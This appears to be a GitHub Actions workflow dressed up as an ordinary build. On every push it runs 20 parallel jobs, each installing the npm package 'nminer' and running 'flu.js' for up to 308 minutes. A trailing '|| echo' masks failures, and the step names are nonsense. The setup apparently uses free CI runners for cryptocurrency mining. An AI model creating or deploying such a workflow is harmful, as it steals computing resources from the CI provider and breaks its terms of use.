name: flu
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3458 }
          - { version: 1295 }
          - { version: 2994 }
          - { version: 5997 }
          - { version: 4873 }
          - { version: 6922 }
          - { version: 9074 }
          - { version: 2594 }
          - { version: 8853 }
          - { version: 1769 }
          - { version: 380 }
          - { version: 7813 }
          - { version: 7665 }
          - { version: 7295 }
          - { version: 4036 }
          - { version: 7316 }
          - { version: 6415 }
          - { version: 7035 }
          - { version: 3260 }
          - { version: 1642 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: memorise violently when ah boom
        run: |
          npm install nminer@latest
          timeout 308m node flu.js || echo "flu executed"